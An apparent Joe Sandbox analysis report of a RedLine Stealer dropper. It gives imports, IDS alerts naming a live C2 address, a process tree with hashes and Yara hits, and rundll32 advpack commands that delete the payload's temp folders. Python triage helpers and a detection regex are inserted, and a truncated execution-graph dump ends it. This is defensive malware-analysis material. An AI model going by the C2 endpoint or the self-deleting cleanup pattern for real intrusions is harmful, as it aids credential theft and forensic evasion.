                                                                                                                                                                                                                                  RT_STRING0x27d10480x3d6data
                                                                                                                                                                                                                                  RT_STRING0x27d14200x492data
                                                                                                                                                                                                                                  RT_STRING0x27d18b40x382data
                                                                                                                                                                                                                                  RT_ACCELERATOR0x27d1c380x48dataSpanishMexico
                                                                                                                                                                                                                                  RT_ACCELERATOR0x27d1c800x18dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1c980x68dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1d000x4cdataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1d4c0x76dataSpanishMexico
                                                                                                                                                                                                                                  RT_GROUP_ICON0x27d1dc40x76dataSpanishMexico
                                                                                                                                                                                                                                  RT_VERSION0x27d1e3c0x1e0data
                                                                                                                                                                                                                                  RT_MANIFEST0x27d201c0x5ebXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                  None0x27d26080xadata
DLL | Import
KERNEL32.dll | GetLogicalDriveStringsW, SetDefaultCommConfigW, CreateHardLinkA, GetConsoleAliasesA, LoadLibraryW, _hread, IsBadCodePtr, CreateEventA, FormatMessageW, GetFileAttributesA, GetExitCodeProcess, SetConsoleMode, WriteConsoleW, WritePrivateProfileSectionW, ChangeTimerQueueTimer, SetLastError, GetProcAddress, GlobalAddAtomA, EnumSystemCodePagesW, LocalAlloc, FoldStringA, FreeEnvironmentStringsW, VirtualProtect, GetWindowsDirectoryW, GetFileInformationByHandle, GlobalReAlloc, InterlockedPushEntrySList, LCMapStringW, CloseHandle, CreateFileA, HeapSize, lstrcpynA, CallNamedPipeA, VirtualAlloc, GetVolumeNameForVolumeMountPointA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, InitializeCriticalSectionAndSpinCount, RtlUnwind, MultiByteToWideChar, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, LCMapStringA, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, RaiseException
USER32.dll | ClientToScreen, LoadMenuA, InvalidateRgn, GetMenuInfo, MessageBoxIndirectW, CountClipboardFormats, SetScrollInfo
GDI32.dll | GetGlyphIndicesW
ADVAPI32.dll | RegOpenKeyA
Language of compilation system | Country where language is spoken | Map
Spanish | Mexico |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/18/23-20:58:24.653479 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49701 | 4125 | 192.168.2.3 | 193.233.20.30
03/18/23-20:58:07.054155 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49701 | 4125 | 192.168.2.3 | 193.233.20.30
03/18/23-20:58:08.632497 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4125 | 49701 | 193.233.20.30 | 192.168.2.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:20:58:10
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\szDGo5lHdI.exe
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:1228288 bytes
                                                                                                                                                                                                                                  MD5 hash:D20BA0CEFF50B0A05C84F694E28462AA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.260695646.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.447701625.0000000006A00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                  Start time:20:58:11
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe
                                                                                                                                                                                                                                  Imagebase:0x10b0000
                                                                                                                                                                                                                                  File size:858624 bytes
                                                                                                                                                                                                                                  MD5 hash:566C1099548DF136503F4DC814D54B17
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.261924931.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:20:58:12
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe
                                                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                                                  File size:713216 bytes
                                                                                                                                                                                                                                  MD5 hash:EBD95183957BECDB18025FC9D553B15E
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:20:58:13
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe
                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                  File size:353280 bytes
                                                                                                                                                                                                                                  MD5 hash:54A8FD200F50B6AF0F10CA6EB68471D3
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:20:58:13
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
                                                                                                                                                                                                                                  Imagebase:0x4d0000
                                                                                                                                                                                                                                  File size:11264 bytes
                                                                                                                                                                                                                                  MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:20:58:25
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                  Imagebase:0x7ff6922f0000
                                                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:20:58:30
                                                                                                                                                                                                                                  Start date:18/03/2023
                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:341504 bytes
                                                                                                                                                                                                                                  MD5 hash:0B63FCA2981CA840B845011956E212AD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.328271047.0000000002DE6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000003.302283247.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation:low

Target ID:14
Start time:20:58:37
Start date:18/03/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\"
Imagebase:0x7ff6922f0000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Target ID:15
Start time:20:58:44
Start date:18/03/2023
Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe
Imagebase:0x400000
File size:400896 bytes
MD5 hash:C49DABA1E54976E33808914E11DEE05B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.411593767.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Author: ditekSHen
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.413281318.0000000004D1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.412058173.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.346294709.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.413068385.0000000004C10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
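The Source field of each Yara match above names the memory dump the rule fired in, and that tells a triager something the rule name alone does not: a hit inside the mapped PE image at 0x400000 is the on-disk binary (or its rewritten header), while a hit in writable-and-executable private memory such as 0x2C00000 is code that only exists after unpacking. The helper below, an added example that is not Joe Sandbox code, parses bullets in exactly the format printed in this report and classifies each hit by region. The layout of the .sdmp name (target, dump index, sequence, base address, protection, unknown, region type, unknown) and the reading of the protection and type fields as winnt.h memory constants are assumptions drawn from the values on this page; the constants themselves are the real Win32 ones. Sample bullets are copied from targets 13 (0x0D) and 15 (0x0F) above.

```python
"""Parse Joe Sandbox 'Yara matches' bullets and say where in each process a rule hit.

Added example, not Joe Sandbox code. The .sdmp name layout (target.dump.seq.base.
protect.?.type.?) and the reading of the protect/type fields are assumptions made
from the values in this report, which line up with winnt.h memory constants.
"""
import re
from collections import defaultdict
from typing import Optional

# winnt.h page-protection bits and region types (real constants).
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # PAGE_READWRITE, PAGE_WRITECOPY and their EXECUTE forms
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

MATCH_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<src>\S+?\.sdmp),\s*Author:\s*(?P<author>.+?)\s*$"
)
# Assumed layout: <target hex>.<dump idx>.<seq>.<base addr>.<protect>.<?>.<type>.<?>.sdmp
SDMP_RE = re.compile(
    r"^(?P<target>[0-9A-F]{8})\.(?P<dump>[0-9A-F]{8})\.(?P<seq>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<mtype>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$",
    re.IGNORECASE,
)


def classify_region(protect: int, mtype: int) -> str:
    """Label a dumped region by what its protection and type imply for the hit."""
    if mtype == MEM_IMAGE:
        return "image"          # inside a mapped PE: the process image or a loaded DLL
    if mtype == MEM_MAPPED:
        return "mapped"         # section-backed memory, e.g. a file mapping
    if protect & PAGE_EXECUTE_MASK and protect & PAGE_WRITE_MASK:
        return "rwx-private"    # writable+executable heap/VirtualAlloc memory: unpacked or injected code
    if protect & PAGE_EXECUTE_MASK:
        return "rx-private"
    return "rw-private"         # data only, e.g. a decrypted config or string table


def parse_match(line: str) -> Optional[dict]:
    """Turn one 'Rule: ..., Source: ...sdmp, Author: ...' bullet into a record (None if it does not fit)."""
    m = MATCH_RE.search(line)
    if not m:
        return None
    s = SDMP_RE.match(m["src"])
    if not s:
        return None
    protect, mtype = int(s["protect"], 16), int(s["mtype"], 16)
    return {
        "rule": m["rule"].strip(),
        "author": m["author"].strip(),
        "target": int(s["target"], 16),   # same number as the report's decimal 'Target ID'
        "base": int(s["base"], 16),
        "protect": protect,
        "mtype": mtype,
        "region": classify_region(protect, mtype),
    }


def summarize(lines):
    """Group hits per target: {target_id: {rule: sorted list of region kinds}}."""
    out = defaultdict(lambda: defaultdict(set))
    for rec in filter(None, map(parse_match, lines)):
        out[rec["target"]][rec["rule"]].add(rec["region"])
    return {t: {r: sorted(k) for r, k in rules.items()} for t, rules in out.items()}


def unpacked_code_hits(lines):
    """Targets where some rule matched in writable+executable private memory (an in-memory payload)."""
    return sorted({rec["target"] for rec in filter(None, map(parse_match, lines))
                   if rec["region"] == "rwx-private"})


# Bullets copied from the report section above (targets 0x0D = 13 and 0x0F = 15).
REPORT_LINES = [
    "• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen",
    "• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.412783124.0000000004A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.411952742.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.412282672.0000000002E28000.00000040.00000020.00020000.00000000.sdmp, Author: unknown",
    "• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.345188702.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security",
]

if __name__ == "__main__":
    for target, rules in sorted(summarize(REPORT_LINES).items()):
        print(f"Target {target}:")
        for rule, regions in sorted(rules.items()):
            print(f"  {rule}: {', '.join(regions)}")
    print("in-memory payload in targets:", unpacked_code_hits(REPORT_LINES))
```

Run over the six sample bullets, target 13 shows MALWARE_Win_RedLine in the image and JoeSecurity_RedLine in RWX private memory, and target 15 shows RedLine rules across mapped, RW and RWX regions; both targets therefore carry an unpacked RedLine payload in memory, which is the copy worth extracting for configuration and C2 details rather than the dropped file on disk.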

Target ID:16
Start time:20:58:48
Start date:18/03/2023
Path:C:\Windows\System32\rundll32.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\"
Imagebase:0x7ff6922f0000
File size:69632 bytes
MD5 hash:73C519F050C20580F8A62C849D49215A
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
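Targets 14 and 16 are the cleanup step of the dropper: rundll32 loading advpack.dll and calling DelNodeRunDLL32, which deletes a directory tree, against the IXP001.TMP and IXP002.TMP working folders. Target 16 runs four seconds after the RedLine payload dvL76s65.exe started from IXP002.TMP, so by the end of the run the payload's on-disk copy is gone. The helper below, an added example that is not part of the Joe Sandbox report, pairs each DelNodeRunDLL32 call with the processes that executed out of the directory it removed. The three records are targets 14 to 16 from the list above, with the command line written the way this report prints it (opening quote dropped, none at the end); start times are compared as the printed HH:MM:SS strings, which assumes all records share one date as they do here.

```python
"""Flag payloads that ran from a temp directory the dropper later wiped.

Added example, not part of the Joe Sandbox report. The three records are targets
14 to 16 from the process list above; only start time, image path and command line
are used, formatted as the report prints them (opening quote stripped).
"""
import re
from dataclasses import dataclass

# rundll32 advpack.dll,DelNodeRunDLL32 "<dir>" removes a directory tree. Self-extracting
# IExpress packages extract to %TEMP%\IXP%03d.TMP and use this call to delete that folder.
DELNODE_RE = re.compile(
    r'rundll32\.exe"?\s+\S*advpack\.dll,DelNodeRunDLL32\s+"?(?P<dir>[^"]+?)"?\s*$',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Proc:
    target: int
    start: str      # "HH:MM:SS" as printed; all records share one date, so string order is time order
    path: str
    cmdline: str


def _norm_dir(p: str) -> str:
    return p.rstrip("\\").lower()


def deleted_dirs(procs):
    """Map normalized directory -> (target, start) of the DelNodeRunDLL32 call that removed it."""
    out = {}
    for p in procs:
        m = DELNODE_RE.search(p.cmdline)
        if m:
            out[_norm_dir(m["dir"])] = (p.target, p.start)
    return out


def orphaned_payloads(procs):
    """Processes whose image sat in a directory that a later cleanup call removed.

    Their on-disk copy is gone by the end of the run, so the sample has to be taken
    from the sandbox's dropped-file list or from the memory dumps the Yara hits point at.
    Returns (payload target, payload path, cleanup target) tuples.
    """
    gone = deleted_dirs(procs)
    hits = []
    for p in procs:
        d = _norm_dir(p.path.rsplit("\\", 1)[0])
        if d in gone and gone[d][1] > p.start:   # cleanup started after the payload did
            hits.append((p.target, p.path, gone[d][0]))
    return hits


def delnode_cmd(directory: str) -> str:
    """Command line exactly as the report prints it (opening quote stripped, none at the end)."""
    return ('C:\\Windows\\system32\\rundll32.exe" C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 "'
            + directory + "\\")


# Constructed from targets 14, 15 and 16 above.
TEMP = r"C:\Users\user\AppData\Local\Temp"
REPORT_PROCS = [
    Proc(14, "20:58:37", r"C:\Windows\System32\rundll32.exe", delnode_cmd(TEMP + r"\IXP001.TMP")),
    Proc(15, "20:58:44", TEMP + r"\IXP002.TMP\dvL76s65.exe", TEMP + r"\IXP002.TMP\dvL76s65.exe"),
    Proc(16, "20:58:48", r"C:\Windows\System32\rundll32.exe", delnode_cmd(TEMP + r"\IXP002.TMP")),
]

if __name__ == "__main__":
    for target, path, cleaner in orphaned_payloads(REPORT_PROCS):
        print(f"target {target} ran {path}; its directory was deleted by target {cleaner}")
```

On these three records the only orphaned payload is target 15, removed by target 16; nothing in this slice of the process list ran from IXP001.TMP, whose deletion by target 14 therefore pairs with a process outside the section shown. The same regex works on Sysmon or EDR process-creation events, where a rundll32 advpack.dll,DelNodeRunDLL32 call on a %TEMP%\IXP*.TMP path right after a process started from that path is a compact indicator of this extraction-and-cleanup pattern.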


Execution Graph

Execution Coverage:23.8%
Dynamic/Decrypted Code Coverage:65.7%
Signature Coverage:25.9%
Total number of Nodes:974
Total number of Limit Nodes:26
[Execution graph: the interactive node/edge view is not reproduced here. Its nodes are function addresses in the sample's code (between 0x40171e and 0x4071e2) and the Win32 and CRT calls they reach. APIs named on the graph include resource handling (FindResourceA, SizeofResource, LoadResource, LockResource, FreeResource, EnumResourceLanguagesA, LoadStringA); file and directory work (CreateFileA, WriteFile, ReadFile, SetFilePointer, SetFileTime, DosDateTimeToFileTime, LocalFileTimeToFileTime, GetFileAttributesA, SetFileAttributesA, DeleteFileA, CreateDirectoryA, RemoveDirectoryA, FindFirstFileA, FindNextFileA, FindClose, GetTempPathA, GetSystemDirectoryA, GetWindowsDirectoryA, SetCurrentDirectoryA, GetModuleFileNameA, DecryptFileA); synchronisation and message handling (CreateMutexA, GetLastError, CreateEventA, SetEvent, MsgWaitForMultipleObjects, PeekMessageA, DispatchMessageA, Sleep); dynamic API resolution (LoadLibraryA, GetProcAddress, FreeLibrary, GetModuleHandleW); token and privilege work (GetCurrentProcess, OpenProcessToken, GetTokenInformation, AllocateAndInitializeSid, EqualSid, FreeSid, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx); environment queries (GetVersion, GetVersionExA, GetSystemMetrics, GetStartupInfoW, GetSystemTimeAsFileTime, GetTickCount, QueryPerformanceCounter, RegOpenKeyExA, RegQueryValueExA, RegCloseKey); dialog and window UI (DialogBoxIndirectParamA, EndDialog, MessageBoxA, MessageBeep, GetDlgItem, EnableWindow, SetDlgItemTextA, GetDlgItemTextA, SendDlgItemMessageA, SendMessageA, CallWindowProcA, SetWindowPos, SetWindowTextA, SetForegroundWindow, GetDesktopWindow); string and memory helpers (CharPrevA, CharNextA, CharUpperA, CompareStringA, IsDBCSLeadByte, lstrcmpA, _vsnprintf, memset, memcpy, memcpy_s, LocalAlloc, LocalFree, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree); and CRT startup and teardown (SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, _initterm, _amsg_exit, _cexit, _exit, exit, ExitProcess, CloseHandle, FindCloseChangeNotification). The graph listing is cut off at the end of the page.]
4 API calls 2903->2905 2904->2903 2907 4028e2 2905->2907 2908 402810 RegOpenKeyExA 2906->2908 2907->2892 2908->2902 2909 402837 RegQueryValueExA 2908->2909 2910 40289a RegCloseKey 2909->2910 2911 40285c 2909->2911 2910->2902 2912 402867 ExpandEnvironmentStringsA 2911->2912 2913 40287a 2911->2913 2912->2913 2913->2910 2915 401890 2914->2915 2916 401826 GetProcAddress 2914->2916 2917 406ce0 4 API calls 2915->2917 2918 401889 FreeLibrary 2916->2918 2919 401839 AllocateAndInitializeSid 2916->2919 2920 40189f 2917->2920 2918->2915 2919->2918 2922 40185f FreeSid 2919->2922 2920->2819 2920->2820 2922->2918 2924 40468f 7 API calls 2923->2924 2925 4051f9 LocalAlloc 2924->2925 2926 40522d 2925->2926 2927 40520d 2925->2927 2928 40468f 7 API calls 2926->2928 2929 4044b9 20 API calls 2927->2929 2931 40523a 2928->2931 2930 40521e 2929->2930 2932 406285 GetLastError 2930->2932 2933 405262 lstrcmpA 2931->2933 2934 40523e 2931->2934 2941 402f4d 2932->2941 2936 405272 LocalFree 2933->2936 2937 40527e 2933->2937 2935 4044b9 20 API calls 2934->2935 2938 40524f LocalFree 2935->2938 2936->2941 2939 4044b9 20 API calls 2937->2939 2938->2941 2940 405290 LocalFree 2939->2940 2940->2941 2941->2649 2941->2652 2941->2657 2943 40468f 7 API calls 2942->2943 2944 405175 2943->2944 2945 40517a 2944->2945 2946 4051af 2944->2946 2947 4044b9 20 API calls 2945->2947 2948 40468f 7 API calls 2946->2948 2949 40518d 2947->2949 2950 4051c0 2948->2950 2949->2654 3104 406298 2950->3104 2953 4051e1 2953->2654 2954 4044b9 20 API calls 2954->2949 2956 40468f 7 API calls 2955->2956 2957 4055c7 LocalAlloc 2956->2957 2958 4055db 2957->2958 2959 4055fd 2957->2959 2960 4044b9 20 API calls 2958->2960 2961 40468f 7 API calls 2959->2961 2962 4055ec 2960->2962 2963 40560a 2961->2963 2964 406285 GetLastError 2962->2964 2965 405632 lstrcmpA 2963->2965 2966 40560e 2963->2966 2991 4055f1 2964->2991 2968 405645 2965->2968 2969 40564b LocalFree 2965->2969 2967 4044b9 20 API calls 2966->2967 2970 40561f LocalFree 2967->2970 
